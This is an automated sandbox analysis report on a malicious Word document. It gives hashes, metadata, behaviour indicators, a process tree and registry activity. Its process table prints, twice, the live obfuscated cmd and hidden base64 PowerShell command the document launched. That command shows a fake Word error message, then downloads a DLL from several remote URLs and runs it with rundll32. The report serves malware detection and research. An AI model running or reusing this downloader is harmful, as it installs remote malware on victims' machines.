| File name: | 9531fa77ee3ed1afedbd83310b3ed0e610c814beb5f8d54f7e5e35503b773097 |
| Full analysis: | https://app.any.run/tasks/a7c0dd03-b241-4bbf-8fea-a1690f53f6fe |
| Verdict: | Malicious activity |
| Analysis date: | December 18, 2024, 21:12:43 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 21 07:40:00 2021, Last Saved Time/Date: Wed Dec 18 16:01:00 2024, Number of Pages: 1, Number of Words: 4111, Number of Characters: 23434, Security: 8 |
| MD5: | 3C61D590E433A890CDBB9800D62E20A0 |
| SHA1: | 7C2119FEA62D08F164A40D7CF2A2C6BD90DBCA24 |
| SHA256: | 9531FA77EE3ED1AFEDBD83310B3ED0E610C814BEB5F8D54F7E5E35503B773097 |
| SSDEEP: | 1536:UUhqXICTCTCTCTCTCTCTCTCTCTCTCTCTCekBbC1R8TUuzpGFAuchccccccozyDuj:UF6Uukmq0UBsZs62H6bUgzWB |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 5788)
Script downloads file (POWERSHELL)
- powershell.exe (PID: 5788)
SUSPICIOUS
Executed via WMI
- cmd.exe (PID: 2356)
Creates an object to access WMI (SCRIPT)
- WINWORD.EXE (PID: 3532)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 2356)
Accesses name of a user that is currently logged on via WMI (SCRIPT)
- WINWORD.EXE (PID: 3532)
Base64-obfuscated command line is found
- cmd.exe (PID: 2356)
BASE64 encoded PowerShell command has been detected
- cmd.exe (PID: 2356)
Creates a directory (POWERSHELL)
- powershell.exe (PID: 5788)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 5788)
INFO
Sends debugging messages
- WINWORD.EXE (PID: 3532)
Gets or sets the time when the file was last written to (POWERSHELL)
- powershell.exe (PID: 5788)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 5788)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 5788)
Disables trace logs
- powershell.exe (PID: 5788)
Checks proxy server information
- powershell.exe (PID: 5788)
Gets data length (POWERSHELL)
- powershell.exe (PID: 5788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Identification: | Word 8.0 |
|---|---|
| LanguageCode: | English (US) |
| DocFlags: | 1Table, ExtChar |
| System: | Windows |
| Word97: | No |
| Title: | - |
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Template: | Normal |
| LastModifiedBy: | - |
| Software: | Microsoft Office Word |
| CreateDate: | 2021:01:21 07:40:00 |
| ModifyDate: | 2024:12:18 16:01:00 |
| Security: | Locked for annotations |
| CodePage: | Unicode (UTF-8) |
| Company: | - |
| CharCountWithSpaces: | 27491 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
| LastPrinted: | 0000:00:00 00:00:00 |
| RevisionNumber: | 1 |
| TotalEditTime: | - |
| Words: | 4111 |
| Characters: | 23434 |
| Pages: | 1 |
| Paragraphs: | 54 |
| Lines: | 195 |
Total processes
127
Monitored processes
7
Malicious processes
2
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2356 | cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA | C:\Windows\System32\cmd.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3532 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\9531fa77ee3ed1afedbd83310b3ed0e610c814beb5f8d54f7e5e35503b773097.doc /o "" | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 16.0.16026.20146 Modules
| |||||||||||||||
| 4164 | msg admin /v Word experienced an error trying to open the file. | C:\Windows\System32\msg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Message Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4976 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5788 | powershell -w hidden -enc IABTAGUAdAAgACgAIgBUAHAAIgArACIASAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9AHsANAB9ACIALQBmACAAJwBTAFkAJwAsACcAcwB0ACcALAAnAGUAJwAsACcATQAuAEkAbwAnACwAJwAuAGQAaQByAEUAQwBUAE8AcgBZACcAKQApADsAIAAgACAAIABzAGUAVAAtAEkAdABlAE0AIAB2AEEAUgBpAGEAYgBsAEUAOgB5AE4ATwA4AGsAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsANAB9AHsANQB9AHsAMgB9ACIALQBGACAAJwBzAEUAcgBWAEkAJwAsACcAcwBZAFMAdABFAG0ALgBOAGUAJwAsACcAVABNAEEAbgBhAEcAZQBSACcALAAnAHQALgAnACwAJwBDAGUAJwAsACcAUABPAGkATgAnACkAIAApACAAOwAgACQATwBjADgAcwB5AHAAawA9ACQARgA1ADQATgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAWAA3AF8ASQA7ACQAUAA2ADEAUQA9ACgAJwBNADYAJwArACcAOABMACcAKQA7ACAAJABUAHAASAA6ADoAIgBjAFIARQBgAEEAdABlAGAARABgAGkAcgBlAEMAVABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwACcAKwAnAH0ARgBxAGIAJwArACgAJwBkACcAKwAnAHcAeAAnACkAKwAnAGgAewAwAH0AUwAyAGcAaQA4ACcAKwAnADcAYgB7ADAAfQAnACkALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQATAA4ADcARwA9ACgAJwBOACcAKwAoACcAMAA5ACcAKwAnAEcAJwApACkAOwAgACAAJABZAG4ATwA4AEsAOgA6ACIAUwBlAGMAVQByAGkAYABUAFkAcABSAG8AVABgAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAQQA4ADEAWQA9ACgAKAAnAEYAJwArACcAMQA5ACcAKQArACcAUAAnACkAOwAkAFgANAB3AHgAbgByADEAIAA9ACAAKAAoACcAVgAyACcAKwAnADkAJwApACsAJwBUACcAKQA7ACQAUQA0ADEAVwA9ACgAJwBTADMAJwArACcANQBDACcAKQA7ACQASQBwADQAZgB3AF8AZQA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBXADAARgBxACcAKwAnAGIAJwApACsAJwBkAHcAJwArACgAJwB4AGgAJwArACcAUgAnACkAKwAoACcAVwAwACcAKwAnAFMAMgAnACsAJwBnAGkAJwApACsAKAAnADgANwBiACcAKwAnAFIAJwArACcAVwAwACcAKQApAC4AIgBSAGAARQBwAGwAQQBgAEMARQAiACgAKAAnAFIAVwAnACsAJwAwACcAKQAsAFsAcwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQA5ADIAKQApACsAJABYADQAdwB4AG4AcgAxACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABPADAAMgBVAD0AKAAoACcAQQAnACsAJwAwADgAJwApACsAJwBMACcAKQA7ACQAWAA5ADgAdgB0AHAAZAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEoANQBqAGQAYQB0AHMAPQAoACgAJwBzAGcAIAAnACsAJwB5AHcAIAAnACkAKwAnAGEAJwArACcAaAAnACsAJwA6ACcAKwAoACcALwAvAHQAJwArACcAcgBlAG4AJwArACcAZABtAG8AJwApACsAKAAnAHYAZQByACcAKwAnAHMAZAB1ACcAKQArACcAYgBhACcAKwAnAGkAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAnACsAKAAnAC8AYwAnACsAJwBnAGkALQBiAGkAbgAnACsAJwAvAEIANwAnACkAKwAoACcAMwAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAgAHkAdwAnACsAJwAgACcAKQArACcAYQAnACsAKAAnAGgAOgAvAC8AJwArACcAZAByAHkAYQBxAHUAZQAnACsAJwBsACcAKwAnAGkAJwApACsAJwBuACcAKwAnAGcAJwArACcAcgAnACsAJwBkACcAKwAnAG8ALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAFMAJwApACsAKAAnAEkALwAhACcAKwAnAHMAJwApACsAJwBnACAAJwArACgAJwB5AHcAJwArACcAIABhAGgAOgAvACcAKwAnAC8AYgBhAHIAJwArACcAZAAnACsAJwBpAGEAJwApACsAJwBzACcAKwAoACcAdABvACcAKwAnAHIAJwArACcAZQAuAGMAbwAnACkAKwAoACcAbQAvAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQArACgAJwBpAG4ALwAnACsAJwBBADEAMgAnACsAJwA4ADMAJwApACsAKAAnAC8AIQAnACsAJwBzAGcAIAB5ACcAKQArACgAJwB3ACcAKwAnACAAYQBoACcAKQArACgAJwA6AC8ALwAnACsAJwBvAHgAeQBjACcAKQArACcAbwAnACsAJwBkAGUAJwArACgAJwAuAG4AJwArACcAZQAnACkAKwAoACcAdAAvACcAKwAnAHcAJwApACsAJwBwAC0AJwArACcAYQAnACsAJwBkACcAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwB4ACcAKwAnAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAnACsAJwAgAGEAaAAnACkAKwAnADoALwAnACsAKAAnAC8AZgBhACcAKwAnAGIAdQAnACsAJwBsAG8AJwApACsAKAAnAHUAcwBzAHQAeQBsAHoALgAnACsAJwBuACcAKwAnAGUAJwApACsAJwB0ACcAKwAoACcALwAyADQAOAAxADUAJwArACcAMgAnACsAJwAyADkANgAvAFQAJwArACcAcABJAC8AIQAnACsAJwBzAGcAJwArACcAIAB5ACcAKwAnAHcAIABhAGgAOgAnACkAKwAoACcALwAvACcAKwAnAGEAYgAnACsAJwBkAG8AJwApACsAJwAtAGEAJwArACcAbAB5ACcAKwAoACcAZQAnACsAJwBtAGUAJwApACsAJwBuACcAKwAnAGkAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwAnACsAJwBwAC0AYQBkAG0AJwApACsAJwBpAG4AJwArACgAJwAvAHMAJwArACcAZQBHADYALwAnACkAKwAnACEAJwArACcAcwAnACsAJwBnACcAKwAoACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvAGcAJwArACcAaQB0ACcAKQArACcAZQAnACsAKAAnAHMAJwArACcAbABhAGMAJwApACsAJwBvACcAKwAnAGwAJwArACgAJwBvAG0AYgBpAGUAJwArACcAcgBlACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBGAFYAJwArACcALwAnACkAKQAuACIAUgBlAFAAbABgAEEAYwBlACIAKAAoACgAJwBzAGcAJwArACcAIAB5ACcAKQArACcAdwAnACsAKAAnACAAJwArACcAYQBoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABYADkAOAB2AHQAcABkACwAJwB3AGQAJwApAFsAMwBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFgANgAyAEkAIAArACAAJABPAGMAOABzAHkAcABrACAAKwAgACQASwA5ADIARAApADsAJABKADAAMABGAD0AKAAnAEUAJwArACgAJwA5ACcAKwAnAF8ATwAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAA5AHkAagBxAGkAcwAgAGkAbgAgACQASgA1AGoAZABhAHQAcwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQAnACsAJwBjAHQAJwApACAAUwB5AFMAdABlAE0ALgBOAGUAdAAuAHcARQBCAGMATABpAEUAbgBUACkALgAiAEQAYABvAHcAbgBgAGwATwBhAGQAZgBpAEwARQAiACgAJABMADkAeQBqAHEAaQBzACwAIAAkAEkAcAA0AGYAdwBfAGUAKQA7ACQAVgAzAF8ATAA9ACgAKAAnAEoAJwArACcAXwBfACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBwADQAZgB3AF8AZQApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADgANQApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABJAHAANABmAHcAXwBlACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AGAATwBzAGAAVAByAGkAbgBnACIAKAApADsAJABLADQAMABFAD0AKAAnAEYAOQAnACsAJwAzAEcAJwApADsAYgByAGUAYQBrADsAJABDADQAMQBFAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAUQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAAyADMAQgA9ACgAKAAnAFAAOAAnACsAJwA3ACcAKQArACcASQAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6092 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "167A87A5-F692-498F-BFE8-2C3C5682087A" "C2304F1F-9381-45D3-B492-7528C4685590" "3532" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64. Version: 0.12.2.0 Modules
| |||||||||||||||
Total events
19 426
Read events
19 044
Write events
358
Delete events
24
Modification events
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling |
| Operation: | write | Name: | 0 |
Value: 017012000000001000B24E9A3E02000000000000000600000000000000 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3532 |
| Operation: | write | Name: | 0 |
Value: 0B0E105DD690B849D628468E744D3C6BC6E3A8230046F18FF9CE99B2D4ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511CC1BD2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | en-US |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | de-de |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | fr-fr |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | es-es |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | it-it |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ja-jp |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ko-kr |
Value: 2 | |||
| (PID) Process: | (3532) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | pt-br |
Value: 2 | |||
Executable files
16
Suspicious files
121
Text files
37
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3532 | WINWORD.EXE | C:\Users\admin\Desktop\~$31fa77ee3ed1afedbd83310b3ed0e610c814beb5f8d54f7e5e35503b773097.doc | binary | |
MD5:18E6A075E49212E19013E9A41A87D541 | SHA256:70B4D1610D8BC00C0B22D08004EA50947D9FA4E1977330B23D1E240BE2DF9131 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres | binary | |
MD5:E47B055BEC2A18F84D2C0C8327C78B2E | SHA256:DCC81412957181FDB0F25497C8AE9B5F734B92EDC66584FBFE47A1A1849FE7AA | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin | text | |
MD5:7B66CB4EC0091D6CE5E3AAA6CBDE7F4D | SHA256:BFEB224452018125B597960BF5614D12D94D05E69BD592507B88394FD663CA4D | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5B991049-E2E5-4758-AC48-6AAD8FE473FA | xml | |
MD5:8893C72F840A8D3F985FBBCAE811F58B | SHA256:6AD58F0DA79942806C44E79362CF4C2645B3BF5085F1EBF4405EBF9EBA6FE283 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:62381E963843ECE07D162C1AE2D70B28 | SHA256:23ED52C06ADEF0A4F69EEE17C8D528A50D82C9B9784B342F6E8953D2420CE8F7 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S | binary | |
